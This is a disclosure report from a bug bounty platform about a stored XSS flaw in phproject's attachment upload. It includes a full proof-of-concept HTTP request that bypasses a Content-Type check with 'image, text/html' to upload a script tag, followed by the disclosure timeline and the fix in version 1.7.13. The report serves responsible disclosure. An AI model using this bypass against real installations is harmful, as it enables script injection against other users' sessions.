Unrestricted Upload of File with Dangerous Type in alanaktion/phproject

Valid

Reported on

Feb 14th 2022

Description

When the user clicks on the file, the application will checking Content-Type to decide whether to download or display the data directly. However, due to incorrect checking, a vulnerability exists leads to Stored XSS. I recommend that the force action relies on the file format instead of Content-Type for safety.

Proof of Concept

Step 1: Login as demo user and go to https://demo.phproject.org/issues/1
Step 2: Call this request to upload file. Note that Content-Type must be "image, text/html" to pass the check.

POST /issues/upload HTTP/2
Host: demo.phproject.org
Cookie: XSRF-TOKEN=ed4de2a8f5b360f9aea473898318a501217eee224996925ff3ae8ff0bc80b02a; phproj_token=2da1ad903a0a52daba9781f455cbc3625b3b815df46ed9aec3fbc9a81896cf38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------5089983053658145839550568449
Content-Length: 778
Origin: https://demo.phproject.org
Referer: https://demo.phproject.org/issues/1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------5089983053658145839550568449
Content-Disposition: form-data; name="csrf-token"

ed4de2a8f5b360f9aea473898318a501217eee224996925ff3ae8ff0bc80b02a
-----------------------------5089983053658145839550568449
Content-Disposition: form-data; name="issue_id"

1
-----------------------------5089983053658145839550568449
Content-Disposition: form-data; name="attachment"; filename="tmp_html.html"
Content-Type: image, text/html

<script>alert(origin)</script>
-----------------------------5089983053658145839550568449
Content-Disposition: form-data; name="text"


-----------------------------5089983053658145839550568449
Content-Disposition: form-data; name="notify"

1
-----------------------------5089983053658145839550568449--

Step 3: Go to https://demo.phproject.org/issues/1 and click the file, you will see alert popup
PoC: https://drive.google.com/file/d/1dl3Ym-rYnc5pE_NbpBriqXfqMZvlWjUL/view?usp=sharing

Impact

Attackers can bypass check for forcing to upload html file, leads to Stored XSS.

Occurrences

files.php L263

We are processing your report and will contact the alanaktion/phproject team within 24 hours. a year ago

We have contacted a member of the alanaktion/phproject team and are waiting to hear back a year ago

We have sent a follow up to the alanaktion/phproject team. We will try again in 7 days. a year ago

We have sent a second follow up to the alanaktion/phproject team. We will try again in 10 days. a year ago

We have sent a third and final follow up to the alanaktion/phproject team. This report is now considered stale. a year ago

Alan Hardman validated this vulnerability a year ago

nhiephon has been awarded the disclosure bounty

The fix bounty is now up for grabs

Alan Hardman marked this as fixed in 1.7.13 with commit 798453 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

files.php#L263 has been validated

to join this conversation